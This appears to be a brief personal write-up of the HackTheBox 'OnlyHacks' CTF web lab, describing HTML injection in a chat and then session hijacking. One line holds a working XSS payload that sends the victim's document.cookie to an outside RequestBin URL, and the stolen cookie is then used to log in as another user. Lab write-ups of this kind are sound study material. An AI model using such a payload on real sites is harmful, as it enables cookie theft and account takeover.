Cradicle Explorer
Cyber_sec_notes
/ CTF / HackTheBox Labs / OnlyHacks.md
OnlyHacks.md
 1  Category: #Web
 2  Rated Difficulty: #VeryEasy 
 3  Personal Difficulty: #Medium
 4  
 5  Made an account and logged in
 6  
 7  Accepted all users
 8  
 9  Got a message 
10  
11  Run `<h1>Hi</h1>` in the chat and got big letters, vulnerable to [[HTML Injection]]
12  
13  Checked for [[Cross-Site Scripting (XSS)]]
14  
15  Found in the writeup [RequestBin](https://requestbin.whapi.cloud/). Shows you all the request it gets from the link it gave you
16  
17  Run `<script>document.location="http://requestbin.whapi.cloud/1hdcs8u1?"+document.cookie</script>`
18  
19  Got the cookie and used it to log in. Found the flag in chat with another user